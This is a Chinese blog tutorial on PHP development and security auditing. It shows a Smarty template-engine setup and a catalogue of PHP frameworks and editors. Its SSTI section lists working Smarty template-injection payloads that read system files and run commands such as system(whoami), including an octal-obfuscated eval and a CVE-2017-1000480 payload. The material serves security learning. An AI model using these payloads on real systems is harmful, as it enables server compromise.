Web开发-PHP应用&组件框架&前端模版渲染&三方插件&富文本编辑器&CVE审计

SuperherRo

于 2025-03-09 18:58:56 发布

阅读量709

点赞数 16

分类专栏： # Web开发文章标签： php 组件框架模板引擎编辑器第三方插件

本文链接：https://blog.csdn.net/m0_60571842/article/details/146136493

版权

Web开发专栏收录该内容

23 篇文章

订阅专栏

知识点：
1、安全开发-原生PHP-开发组件集合
2、安全开发-原生PHP-模版引擎渲染
3、安全开发-原生PHP-第三方编辑器

一、演示案例-WEB开发-Smarty模版

模版引擎

在开始介绍Smarty之前先了解一下模板引擎，模板引擎是为了让前端界(html)与程序代码(php)分离而产生的一种解决方案，简单来说就是html文件里再也不用写php代码了。Smarty的原理是变量替换原则，我们只需在html文件写好Smarty的标签即可，例{name}，然后调用Smarty的方法传递变量参数即可。
在这里插入图片描述

模版引擎使用案例：
Php模版引擎框架：Smarty、Twig，codeeval等
python模版引擎框架：jinja2、mako、tornad、Django等
Java模版引擎框架：Thymeleaf、jade、velocity、FreeMarker等
JavaScript模版引擎框架：doT，Nunjucks，Pug，Marko，EJS，Dust等

安全漏洞影响

SSTI（Server Side Template Injection，服务器端模板注入）

下载：https://github.com/smarty-php/smarty/releases
在这里插入图片描述

使用

1、创建一个文件夹，命名为30。

2、下载Smarty对应版本并解压缩到该文件夹中。

在这里插入图片描述

3、创建一个PHP文件，命名为demo.php，并在文件中添加以下代码：

<?php
// 引入 Smarty 类文件
require('smarty3/libs/Smarty.class.php');
// 创建 Smarty 实例
$smarty = new Smarty;
// 设置 Smarty 相关属性,要渲染的文件及渲染后相关配置文件保存路径。不设置就当前默认路径
$smarty->template_dir = 'smarty3/templates/';  //要渲染的文件路径
$smarty->compile_dir = 'smarty3/templates_c/';  //渲染文件后编写文件的路径，最终的页面展示结果以这个路径里的脚本为主。
$smarty->cache_dir = 'smarty3/cache/';
$smarty->config_dir = 'smarty3/configs/'; 
// 赋值变量到模板中
$smarty->assign('title', '欢迎使用 Smarty');
// 显示模板，对这个index.tpl进行渲染
$smarty->display('index.tpl');
?>

4、在smarty3/templates/创建一个名为index.tpl的模板文件，并将以下代码复制到上述点定义文件夹中

<!DOCTYPE html>
<html>
<head>
<title>{$title}</title>
</head>
<body>
<h1>{$title}</h1>
<p>这是一个使用 Smarty 的例子。</p>
</body>
</html>

在这里插入图片描述

渲染文件受控(可控变量或者文件内容可修改)

在这里插入图片描述
CVE参考：
源码分析参考：https://www.cnblogs.com/magic-zero/p/8351974.html
payload参考：https://xz.aliyun.com/t/11108

string:{include file=‘C:/Windows/win.ini’}

在这里插入图片描述

string:{function name='x(){};system(whoami);function '}{/function}

在这里插入图片描述

string:{$smarty.template_object->smarty->_getSmartyObj()->display(‘string:{system(whoami)}’)}

在这里插入图片描述

eval:{math equation=‘(“\163\171\163\164\145\155”)(“\167\150\157\141\155\151”)’}

在这里插入图片描述

*/phpinfo();// //CVE-2017-1000480

在这里插入图片描述

如何确定smarty版本-白盒？

在这里插入图片描述

二、演示案例-WEB开发-插件编辑器

[Web框架]
Laravel: 现代化、功能全面的框架，适合大多数Web应用。
Symfony: 高度模块化、功能强大的框架，适合复杂应用。
CodeIgniter: 轻量级框架，适合快速开发。
Zend Framework (Laminas): 企业级框架，适合大规模应用，具有高扩展性和性能。
Yii: 高性能框架，适合快速开发和大规模应用。

[数据库组件]
Doctrine ORM: 强大的ORM工具，支持复杂的查询和映射。
Eloquent ORM: Laravel内置ORM，简化数据库操作。
PDO: PHP的数据库抽象层，支持多种数据库引擎。
RedBeanPHP: 轻量级ORM，自动创建和管理数据库表。

[模板引擎]
Twig: 灵活、现代的模板引擎，常用于Symfony项目。
Blade: Laravel内置模板引擎，支持模板继承和控制结构。
Smarty: 经典模板引擎，适合中大型项目。
Mustache: 轻量级跨语言模板引擎，支持PHP、JavaScript等。

[路由组件]
FastRoute: 高性能PHP路由库，适用于小型应用和API。
AltoRouter: 轻量级路由库，适合小型项目，易于配置。
Symfony Routing: Symfony的路由组件，适合复杂应用。

[认证与授权]
OAuth2 Server PHP: 实现OAuth2协议的PHP库，适用于API认证。
JWT (JSON Web Token): 轻量级身份验证方案，适合API认证。
PHP-Auth: 简单的用户认证库，适用于中小型Web应用。

[支付集成]
Stripe PHP SDK: 集成Stripe支付功能，支持信用卡支付、订阅等。
PayPal SDK for PHP: 集成PayPal支付功能，支持支付、退款等。

[邮件发送]
PHPMailer: 功能强大的邮件发送库，支持SMTP、POP3等协议。
SwiftMailer: 另一款流行的邮件发送库，支持多种邮件功能。
Mailgun PHP SDK: Mailgun的官方SDK，用于通过Mailgun API发送邮件。

[文件管理]
Flysystem: 文件存储抽象库，支持多种存储方式（如本地、Amazon S3、FTP等）。
Symfony Filesystem: Symfony的文件系统组件，提供简单的文件操作API。
Intervention Image: 图片处理库，支持裁剪、调整大小、水印等功能。

[缓存与性能]
Redis: 内存数据存储系统，用于缓存、消息队列等，提升性能。
Memcached: 内存缓存系统，适用于高并发应用。
Symfony Cache: Symfony缓存组件，支持多种缓存后端。
Laravel Cache: Laravel内置缓存系统，提升Web应用性能。

[日志管理]
Monolog: 强大的日志库，支持多种日志渠道（如文件、数据库、邮件等）。
Log4PHP: Apache Log4j的PHP实现，适用于复杂日志功能。

[任务队列]
Laravel Queue: Laravel内置队列系统，支持延迟任务、异步处理。
Resque: 基于Redis的任务队列库，适用于异步任务处理。
RabbitMQ: 开源消息代理服务，用于任务调度和消息传递。

[WebSocket与实时通信]
Ratchet: 用于实现WebSocket服务，适合在线聊天、实时通信。
Swoole: 高性能协程框架，支持WebSocket、TCP、UDP等协议，适用于高并发实时应用。

[测试与调试]
PHPUnit: PHP标准单元测试框架，广泛用于自动化测试。
Xdebug: PHP调试工具，支持堆栈跟踪、性能分析、断点调试等功能。

[富文本编辑器]
KindEditor: 轻量级且功能丰富的富文本编辑器，支持图片上传、插入视频等，适用于PHP开发的Web项目。
TinyMCE: 开源的富文本编辑器，支持多种格式的文本编辑，插件丰富，易于集成。
CKEditor: 高度可定制的富文本编辑器，支持图片、文件上传、富文本格式化等功能，广泛用于Web项目中。
Froala Editor: 轻量级、现代的富文本编辑器，支持图像处理、视频嵌入、内嵌富文本等，适合复杂的Web应用。
Quill: 开源富文本编辑器，功能强大、轻量级，支持图片、视频、格式设置等功能，适合单页面应用。
Summernote: 基于jQuery的轻量级富文本编辑器，支持文本格式化、图片上传等，适合中小型Web项目。
Trumbowyg: 轻量级富文本编辑器，功能简单但支持基本的文本编辑、图片上传、视频插入等。
Redactor: 现代的富文本编辑器，功能丰富，支持图片、文件上传等，适合多种Web应用。

[图片上传组件]
Dropzone.js: 支持拖拽上传和多文件上传的JavaScript库，易于与PHP集成，常用于图片、文件上传功能。
FilePond: 高度可定制的文件上传库，支持图片预览、验证、上传进度等，适合需要精美上传功能的Web项目。
Fine Uploader: 支持多种文件上传方式的组件，支持多文件上传、拖拽上传，支持PHP处理后台。
Plupload: 支持多种文件上传方式（包括HTML5和Flash），可以与PHP后台集成，广泛用于Web应用中。

[图片处理组件]
ImageMagick: 强大的图像处理库，支持图像格式转换、剪裁、旋转、加水印等多种功能，适用于PHP处理图像。
GD Library: PHP内置图像处理库，支持图像创建、缩放、裁剪、色调调整等功能。
Intervention Image: PHP图像处理库，支持裁剪、缩放、加水印等，易于与Laravel集成。